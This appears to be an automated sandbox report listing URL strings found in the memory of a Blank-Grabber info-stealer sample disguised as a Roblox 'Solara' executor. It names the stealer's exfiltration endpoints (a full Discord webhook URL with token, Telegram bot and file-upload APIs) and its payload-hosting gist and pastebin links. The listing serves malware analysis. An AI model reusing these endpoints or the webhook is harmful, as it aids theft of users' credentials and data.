                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blank-8RmNx.in
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fW
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460347601.000001DCB5A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1398382471.000001DCB5623000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B4A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/api/endpoint.json
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/asset/discord.json
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1406140672.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404697501.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404952130.000001DCB6036000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405277736.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/BlankOBF
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5D21000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408120431.000001DCB5E6F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/issues/86361.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB63B4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412628978.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/29200
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E57000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://json.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C19000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ncs.roblox.com/upload
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nodejs.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C15000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462110032.000001DCB6130000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/specifications/entry-points/
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/pjseRvyK
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1396701791.000001DCB55F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://peps.python.org/pep-0205/
